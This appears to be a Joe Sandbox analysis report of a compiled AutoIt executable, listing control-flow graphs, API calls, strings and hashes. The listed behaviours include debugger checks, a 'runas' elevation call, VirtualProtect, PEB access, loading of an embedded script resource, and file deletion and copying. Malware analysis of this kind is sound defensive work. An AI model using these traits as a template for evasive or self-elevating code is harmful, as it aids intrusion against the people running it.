107093->107109 107154 95fbce 59 API calls 2 library calls 107093->107154 107155 95cfdf 61 API calls 2 library calls 107093->107155 107135 95c96e 107094->107135 107095->107090 107096->107093 107101 95ce00 107150 900c08 107101->107150 107104 95ce33 107107 8e92ce 59 API calls 107104->107107 107105 95ce1a 107156 949e4a 89 API calls 4 library calls 107105->107156 107110 95ce3f 107107->107110 107108 95ce25 GetCurrentProcess TerminateProcess 107108->107104 107109->107088 107109->107094 107111 8e9050 59 API calls 107110->107111 107112 95ce55 107111->107112 107121 95ce7c 107112->107121 107157 8e8d40 59 API calls Mailbox 107112->107157 107114 95cfa4 107114->107090 107116 95cfb8 FreeLibrary 107114->107116 107115 95ce6b 107158 95d649 107 API calls _free 107115->107158 107116->107090 107120 8e9d3c 60 API calls 107120->107121 107121->107114 107121->107120 107159 8e8d40 59 API calls Mailbox 107121->107159 107161 95d649 107 API calls _free 107121->107161 107123 8e7e4f 59 API calls 107122->107123 107124 95d7c0 CharLowerBuffW 107123->107124 107162 93f167 107124->107162 107128 8e7667 59 API calls 107129 95d7f9 107128->107129 107130 8e784b 59 API calls 107129->107130 107131 95d810 107130->107131 107133 8e7d2c 59 API calls 107131->107133 107132 95d858 Mailbox 107132->107093 107134 95d81c Mailbox 107133->107134 107134->107132 107169 95cfdf 61 API calls 2 library calls 107134->107169 107136 95c989 107135->107136 107140 95c9de 107135->107140 107137 900db6 Mailbox 59 API calls 107136->107137 107138 95c9ab 107137->107138 107139 900db6 Mailbox 59 API calls 107138->107139 107138->107140 107139->107138 107141 95da50 107140->107141 107142 95dc79 Mailbox 107141->107142 107149 95da73 _strcat _wcscpy __NMSG_WRITE 107141->107149 107142->107101 107143 8e9b98 59 API calls 107143->107149 107144 8e9be6 59 API calls 107144->107149 107145 8e9b3c 59 API calls 107145->107149 107146 8e9837 84 API calls 107146->107149 107147 90571c 58 API calls std::exception::_Copy_str 107147->107149 107149->107142 107149->107143 107149->107144 107149->107145 107149->107146 107149->107147 107172 945887 61 API calls 2 library calls 107149->107172 107151 900c1d 107150->107151 107152 900cb5 VirtualProtect 107151->107152 107153 900c83 107151->107153 107152->107153 107153->107104 107153->107105 107154->107093 107155->107093 107156->107108 107157->107115 107158->107121 107159->107121 107160->107092 107161->107121 107163 93f192 __NMSG_WRITE 107162->107163 107164 93f1d1 107163->107164 107167 93f1c7 107163->107167 107168 93f278 107163->107168 107164->107128 107164->107134 107167->107164 107170 8e78c4 61 API calls 107167->107170 107168->107164 107171 8e78c4 61 API calls 107168->107171 107169->107132 107170->107167 107171->107168 107172->107149 107173 92416f 107177 935fe6 107173->107177 107175 92417a 107176 935fe6 85 API calls 107175->107176 107176->107175 107183 936020 107177->107183 107185 935ff3 107177->107185 107178 936022 107189 8e9328 84 API calls Mailbox 107178->107189 107180 936027 107181 8e9837 84 API calls 107180->107181 107182 93602e 107181->107182 107184 8e7b2e 59 API calls 107182->107184 107183->107175 107184->107183 107185->107178 107185->107180 107185->107183 107186 93601a 107185->107186 107188 8e95a0 59 API calls _wcsstr 107186->107188 107188->107183 107189->107180 107190 1673a98 107204 16716b8 107190->107204 107192 1673b74 107208 1673988 107192->107208 107205 16716cb 107204->107205 107211 1674bb8 GetPEB 107205->107211 107207 1671d43 107207->107192 107209 1673991 Sleep 107208->107209 107210 167399f 107209->107210 107212 1674be2 107211->107212 107212->107207

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008E3B68
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 008E3B7A
                                                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,009A52F8,009A52E0,?,?), ref: 008E3BEB
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                  • Part of subcall function 008F092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008E3C14,009A52F8,?,?,?), ref: 008F096E
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 008E3C6F
                                                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00997770,00000010), ref: 0091D281
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,009A52F8,?,?,?), ref: 0091D2B9
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00994260,009A52F8,?,?,?), ref: 0091D33F
                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 0091D346
                                                                                                                  • Part of subcall function 008E3A46: GetSysColorBrush.USER32(0000000F), ref: 008E3A50
                                                                                                                  • Part of subcall function 008E3A46: LoadCursorW.USER32(00000000,00007F00), ref: 008E3A5F
                                                                                                                  • Part of subcall function 008E3A46: LoadIconW.USER32(00000063), ref: 008E3A76
                                                                                                                  • Part of subcall function 008E3A46: LoadIconW.USER32(000000A4), ref: 008E3A88
                                                                                                                  • Part of subcall function 008E3A46: LoadIconW.USER32(000000A2), ref: 008E3A9A
                                                                                                                  • Part of subcall function 008E3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008E3AC0
                                                                                                                  • Part of subcall function 008E3A46: RegisterClassExW.USER32(?), ref: 008E3B16
                                                                                                                  • Part of subcall function 008E39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E3A03
                                                                                                                  • Part of subcall function 008E39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E3A24
                                                                                                                  • Part of subcall function 008E39D5: ShowWindow.USER32(00000000,?,?), ref: 008E3A38
                                                                                                                  • Part of subcall function 008E39D5: ShowWindow.USER32(00000000,?,?), ref: 008E3A41
                                                                                                                  • Part of subcall function 008E434A: _memset.LIBCMT ref: 008E4370
                                                                                                                  • Part of subcall function 008E434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E4415
                                                                                                                Strings
                                                                                                                • runas, xrefs: 0091D33A
                                                                                                                • This is a third-party compiled AutoIt script., xrefs: 0091D279
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                • API String ID: 529118366-3287110873
                                                                                                                • Opcode ID: 5fd5f6db0a0d09efb2765a5ea3388a04b412fc8f0f4e925a6a3ea0d89579d426
                                                                                                                • Instruction ID: b835cbf61447af353a8b883372ecb3cd477d37cd7d11316db12f233def44adda
                                                                                                                • Opcode Fuzzy Hash: 5fd5f6db0a0d09efb2765a5ea3388a04b412fc8f0f4e925a6a3ea0d89579d426
                                                                                                                • Instruction Fuzzy Hash: 5D51D731A0C288AECF11ABB9DC15EED7B78FF47744B104065F931E3162DA708A45DB62

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 942 8e49a0-8e4a00 call 8e7667 GetVersionExW call 8e7bcc 947 8e4b0b-8e4b0d 942->947 948 8e4a06 942->948 949 91d767-91d773 947->949 950 8e4a09-8e4a0e 948->950 951 91d774-91d778 949->951 952 8e4a14 950->952 953 8e4b12-8e4b13 950->953 955 91d77b-91d787 951->955 956 91d77a 951->956 954 8e4a15-8e4a4c call 8e7d2c call 8e7726 952->954 953->954 964 91d864-91d867 954->964 965 8e4a52-8e4a53 954->965 955->951 958 91d789-91d78e 955->958 956->955 958->950 960 91d794-91d79b 958->960 960->949 962 91d79d 960->962 966 91d7a2-91d7a5 962->966 967 91d880-91d884 964->967 968 91d869 964->968 965->966 969 8e4a59-8e4a64 965->969 970 91d7ab-91d7c9 966->970 971 8e4a93-8e4aaa GetCurrentProcess IsWow64Process 966->971 972 91d886-91d88f 967->972 973 91d86f-91d878 967->973 976 91d86c 968->976 977 8e4a6a-8e4a6c 969->977 978 91d7ea-91d7f0 969->978 970->971 979 91d7cf-91d7d5 970->979 974 8e4aaf-8e4ac0 971->974 975 8e4aac 971->975 972->976 982 91d891-91d894 972->982 973->967 983 8e4b2b-8e4b35 GetSystemInfo 974->983 984 8e4ac2-8e4ad2 call 8e4b37 974->984 975->974 976->973 985 91d805-91d811 977->985 986 8e4a72-8e4a75 977->986 980 91d7f2-91d7f5 978->980 981 91d7fa-91d800 978->981 987 91d7d7-91d7da 979->987 988 91d7df-91d7e5 979->988 980->971 981->971 982->973 991 8e4af8-8e4b08 983->991 999 8e4b1f-8e4b29 GetSystemInfo 984->999 1000 8e4ad4-8e4ae1 call 8e4b37 984->1000 992 91d813-91d816 985->992 993 91d81b-91d821 985->993 989 91d831-91d834 986->989 990 8e4a7b-8e4a8a 986->990 987->971 988->971 989->971 998 91d83a-91d84f 989->998 995 91d826-91d82c 990->995 996 8e4a90 990->996 992->971 993->971 995->971 996->971 1001 91d851-91d854 998->1001 1002 91d859-91d85f 998->1002 1003 8e4ae9-8e4aed 999->1003 1007 8e4b18-8e4b1d 1000->1007 1008 8e4ae3-8e4ae7 GetNativeSystemInfo 1000->1008 1001->971 1002->971 1003->991 1006 8e4aef-8e4af2 FreeLibrary 1003->1006 1006->991 1007->1008 1008->1003
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 008E49CD
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                • GetCurrentProcess.KERNEL32(?,0096FAEC,00000000,00000000,?), ref: 008E4A9A
                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 008E4AA1
                                                                                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 008E4AE7
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 008E4AF2
                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 008E4B23
                                                                                                                • GetSystemInfo.KERNEL32(00000000), ref: 008E4B2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1986165174-0
                                                                                                                • Opcode ID: 61c589508dfc2057e4b6ce2f23accea6fa7ce123588c1c0d7d72874dd1770c6b
                                                                                                                • Instruction ID: b1b021acc82c1f4e7250c818f3376f3fe7182fa8a23d3352d54988639c9d37af
                                                                                                                • Opcode Fuzzy Hash: 61c589508dfc2057e4b6ce2f23accea6fa7ce123588c1c0d7d72874dd1770c6b
                                                                                                                • Instruction Fuzzy Hash: E391D33198E7C4DEC731DB6994501AAFFF5BF2B310B4849AED0CB93A41D220A548D76A

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1039 8e4e89-8e4ea1 CreateStreamOnHGlobal 1040 8e4ea3-8e4eba FindResourceExW 1039->1040 1041 8e4ec1-8e4ec6 1039->1041 1042 91d933-91d942 LoadResource 1040->1042 1043 8e4ec0 1040->1043 1042->1043 1044 91d948-91d956 SizeofResource 1042->1044 1043->1041 1044->1043 1045 91d95c-91d967 LockResource 1044->1045 1045->1043 1046 91d96d-91d98b 1045->1046 1046->1043
                                                                                                                APIs
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008E4D8E,?,?,00000000,00000000), ref: 008E4E99
                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008E4D8E,?,?,00000000,00000000), ref: 008E4EB0
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,008E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008E4E2F), ref: 0091D937
                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,008E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008E4E2F), ref: 0091D94C
                                                                                                                • LockResource.KERNEL32(008E4D8E,?,?,008E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008E4E2F,00000000), ref: 0091D95F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                • String ID: SCRIPT
                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                • Opcode ID: f510b28a10ac1527c581fe1f36be4d0e177a9ceb7ad2c131c4f31f9b45ca4443
                                                                                                                • Instruction ID: 2ebc5f2a7fd53fcd9d253f87dba3da5c1b50be3feadae412c4937354ebbf60be
                                                                                                                • Opcode Fuzzy Hash: f510b28a10ac1527c581fe1f36be4d0e177a9ceb7ad2c131c4f31f9b45ca4443
                                                                                                                • Instruction Fuzzy Hash: E0115E75244741BFD7218B66EC58F677BBAFBC5B21F10426CF41AC6250DBA1E8009A60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 3964851224-0
                                                                                                                • Opcode ID: 6ef5660142bcf057e64df4a812ae882547a54f1318116fb071f918c3fcb033da
                                                                                                                • Instruction ID: 87e7a23a722d7587a7ccc2365c6c9c28d32c029e7ec4a7ad8d10dad752eddafe
                                                                                                                • Opcode Fuzzy Hash: 6ef5660142bcf057e64df4a812ae882547a54f1318116fb071f918c3fcb033da
                                                                                                                • Instruction Fuzzy Hash: AC9254706083558FD720DF28C480B2ABBE5FF89304F14896DE99A9B262D775EC45CF92
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?,0091E398), ref: 0094446A
                                                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0094447B
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0094448B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 48322524-0
                                                                                                                • Opcode ID: 83eea3cdc0f222b71453881d0c7ba634343a367e035060e33806350637d09bc7
                                                                                                                • Instruction ID: 847ac4dfcd3b1c0369854eda4cb1617017ba16acb78f9437a8ef5e7d24b22fb7
                                                                                                                • Opcode Fuzzy Hash: 83eea3cdc0f222b71453881d0c7ba634343a367e035060e33806350637d09bc7
                                                                                                                • Instruction Fuzzy Hash: 65E0D8374245006746106B38FC1DDE97B9C9E05375F10071AF835C11E0F7B45900A996
                                                                                                                Strings
                                                                                                                • Variable must be of type 'Object'., xrefs: 00923E62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Variable must be of type 'Object'.
                                                                                                                • API String ID: 0-109567571
                                                                                                                • Opcode ID: 3bacdce0d6a36acac8ac2dafe629715d5349492eacd3fac5355315bd26fcbfd8
                                                                                                                • Instruction ID: 90edc2e10727bf4fc2f23e1795ff31653503a7b3eaec5692fd81dc83a5699c9c
                                                                                                                • Opcode Fuzzy Hash: 3bacdce0d6a36acac8ac2dafe629715d5349492eacd3fac5355315bd26fcbfd8
                                                                                                                • Instruction Fuzzy Hash: 69A2BD74A00259CFCB24CF5AC880AAEB7B1FF5A314F248469E915EB356D734ED42CB90
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008F0A5B
                                                                                                                • timeGetTime.WINMM ref: 008F0D16
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008F0E53
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 008F0E61
                                                                                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 008F0EFA
                                                                                                                • DestroyWindow.USER32 ref: 008F0F06
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008F0F20
                                                                                                                • Sleep.KERNEL32(0000000A,?,?), ref: 00924E83
                                                                                                                • TranslateMessage.USER32(?), ref: 00925C60
                                                                                                                • DispatchMessageW.USER32(?), ref: 00925C6E
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00925C82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                • API String ID: 4212290369-3242690629
                                                                                                                • Opcode ID: 721449eba2ec57a37a5f3ecd7944362544535c4fcd26cb51f55963a315d7b2f9
                                                                                                                • Instruction ID: 5e0547e94c4cc21410f259632cd6996cdc3369cd6e7458e646618bf3843811d1
                                                                                                                • Opcode Fuzzy Hash: 721449eba2ec57a37a5f3ecd7944362544535c4fcd26cb51f55963a315d7b2f9
                                                                                                                • Instruction Fuzzy Hash: 5CB2DD70608755DFD728DF24D884BAAB7E4FF85304F15891DE59AD72A2CB70E884CB82

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00948F5F: __time64.LIBCMT ref: 00948F69
                                                                                                                  • Part of subcall function 008E4EE5: _fseek.LIBCMT ref: 008E4EFD
                                                                                                                • __wsplitpath.LIBCMT ref: 00949234
                                                                                                                  • Part of subcall function 009040FB: __wsplitpath_helper.LIBCMT ref: 0090413B
                                                                                                                • _wcscpy.LIBCMT ref: 00949247
                                                                                                                • _wcscat.LIBCMT ref: 0094925A
                                                                                                                • __wsplitpath.LIBCMT ref: 0094927F
                                                                                                                • _wcscat.LIBCMT ref: 00949295
                                                                                                                • _wcscat.LIBCMT ref: 009492A8
                                                                                                                  • Part of subcall function 00948FA5: _memmove.LIBCMT ref: 00948FDE
                                                                                                                  • Part of subcall function 00948FA5: _memmove.LIBCMT ref: 00948FED
                                                                                                                • _wcscmp.LIBCMT ref: 009491EF
                                                                                                                  • Part of subcall function 00949734: _wcscmp.LIBCMT ref: 00949824
                                                                                                                  • Part of subcall function 00949734: _wcscmp.LIBCMT ref: 00949837
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00949452
                                                                                                                • _wcsncpy.LIBCMT ref: 009494C5
                                                                                                                • DeleteFileW.KERNEL32(?,?), ref: 009494FB
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00949511
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00949522
                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00949534
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1500180987-0
                                                                                                                • Opcode ID: 4b28bf5edc2b5765b797042fbb11c1c28b987232d81703499743a869715caa76
                                                                                                                • Instruction ID: db77ed747cf206c226755ab68baf1305668ca6a61b9d3be4f10fa39232bb76f1
                                                                                                                • Opcode Fuzzy Hash: 4b28bf5edc2b5765b797042fbb11c1c28b987232d81703499743a869715caa76
                                                                                                                • Instruction Fuzzy Hash: 6BC128B1900219AEDF21DFA5CC95EDFB7BDEF85310F0040AAF609E6191EB709A448F65

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008E3074
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 008E309E
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E30AF
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 008E30CC
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E30DC
                                                                                                                • LoadIconW.USER32(000000A9), ref: 008E30F2
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E3101
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: 3de76f4b78a125e4eddd1e8be2734e4333c89a553c4dfdb6232cb235b896ef20
                                                                                                                • Instruction ID: 6b5a883b4f1e0621f97d30caf54a2858e7e633492bc17ad2bc9e25f1103f532e
                                                                                                                • Opcode Fuzzy Hash: 3de76f4b78a125e4eddd1e8be2734e4333c89a553c4dfdb6232cb235b896ef20
                                                                                                                • Instruction Fuzzy Hash: C83127B1959349AFDB10CFA4E889A8DBBF0FF09310F14452EE590E62A1D3B90585DF91

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008E3074
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 008E309E
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E30AF
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 008E30CC
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E30DC
                                                                                                                • LoadIconW.USER32(000000A9), ref: 008E30F2
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E3101
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
